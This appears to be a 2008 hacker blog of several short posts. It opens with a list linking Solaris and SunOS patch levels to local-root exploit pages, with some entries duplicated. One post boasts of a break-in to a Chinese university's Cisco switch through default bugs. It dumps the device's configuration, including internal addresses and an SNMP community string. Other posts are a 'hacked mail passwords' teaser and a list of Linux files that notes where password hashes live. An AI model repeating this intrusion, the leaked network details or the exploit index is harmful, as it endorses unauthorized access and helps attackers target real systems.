Solaris 8 with 109147-07 through 109147-24 and without 109147-25 (http://milw0rm.com/exploits/1182)
Solaris 8 with 108993-14 through 108993-31 and without 108993-32 (http://milw0rm.com/exploits/715)
Solaris 8 with 109147-07 through 109147-24 and without 109147-25 (http://milw0rm.com/exploits/1182)
Solaris 8 with 108993-14 through 108993-31 and without 108993-32 (http://milw0rm.com/exploits/715)
Solaris 9 without patch 116308-01 (http://milw0rm.com/exploits/714)
Solaris 9 without patch 116308-01 (http://milw0rm.com/exploits/713)

Solaris 9 without 113476-11 (http://milw0rm.com/exploits/715)
Solaris 9 without 112963-09 (http://milw0rm.com/exploits/1182)
Solaris 9 without 113476-11 (http://milw0rm.com/exploits/715)
Solaris 9 without 112963-09 (http://milw0rm.com/exploits/1182)
Solaris 10 (libnspr) Arbitrary File Creation Local Root Exploit (http://milw0rm.com/exploits/2543)
Solaris 10 (libnspr) constructor Local Root Exploit (http://milw0rm.com/exploits/2641)

SunOS
SunOS 5.10 Generic i86pc i386 i86pc (http://milw0rm.com/exploits/1073)
SunOS 5.9 Generic_112233-12 sun4u (http://milw0rm.com/exploits/1073)

University in China

kavasilo — Tue, 25 Nov 2008 23:58:10 +0000

Sometimes is bad configuration and some times is human stupidity. I can not decide myself so the choice is yours. Some friend obtain the following conf simple using some default cisco bugs. The administrators didnt update the device at all.

User Access Verification
Password:
c3550-north-compus>
c3550-north-compus>
c3550-north-compus>en
Password:
3550-north-compus#
c3550-north-compus#
c3550-north-compus#show conf
Using 4128 out of 393216 bytes
!
version 12.2
no service pad
service timestamps debug uptime
service timestamps log uptime
no service password-encryption
!
hostname c3550-north-compus
enable secret 5 XXXXXXXXXXXXXXXXXXXXXXXX
……………..
………………..
…………….
ip subnet-zero
ip routing
ip dhcp relay information option
ip dhcp excluded-address 172.17.252.1
ip dhcp excluded-address 172.17.253.1
ip dhcp excluded-address 172.17.254.1
……………….
!
vlan internal allocation policy ascending
!
vlan 290
name office
!
vlan 291
name lib
!
vlan 292
name teach
!
vlan 293
name cernetip
!
vlan 294
name manager
!
vlan 976
…………………..
snmp-server community ahunic RO
!
control-plane
!
!
line con 0
line vty 0 4
password xxxxxxxxxx
login
line vty 5 15
login
!
!
end

c3550-north-compus#

…Hack of the year 2007!!!!

kavasilo — Tue, 25 Nov 2008 14:33:55 +0000

This was the hack of the year 2007. A pretty good and interesting story.

The-Hack-Of-The-Year

Proof of concept :

Hacked+Mail+Passwords

Linux Configuration Files (PART III)

kavasilo — Fri, 21 Nov 2008 08:32:43 +0000

/etc/networks Lists names and addresses of networks, used by the route command
/etc/nologin If this file exists, non root logins are disabled
/etc/nsswitch.conf Name service switch configuration file
/etc/passwd Includes username,real name, Home directory, encrypted passwdord
/etc/printcap A configuration file for printers
/etc/profile Files executed at login or startup time by the Bourne or C shells
/etc/rc or /etc/rc.d or /etc/rc?.d Init runs this when it starts
/etc/resolv.conf Configures the name resolver, specifying the address of your name server and your domain name
/etc/securetty Identifies secure terminals from which root is allowed to login
/etc/shadow Encypted passwords
/etc/shadow.group Systems with shadow passwords may have this file
/etc/shells List trusted shells
/etc/sudoers A list of users with specials privileges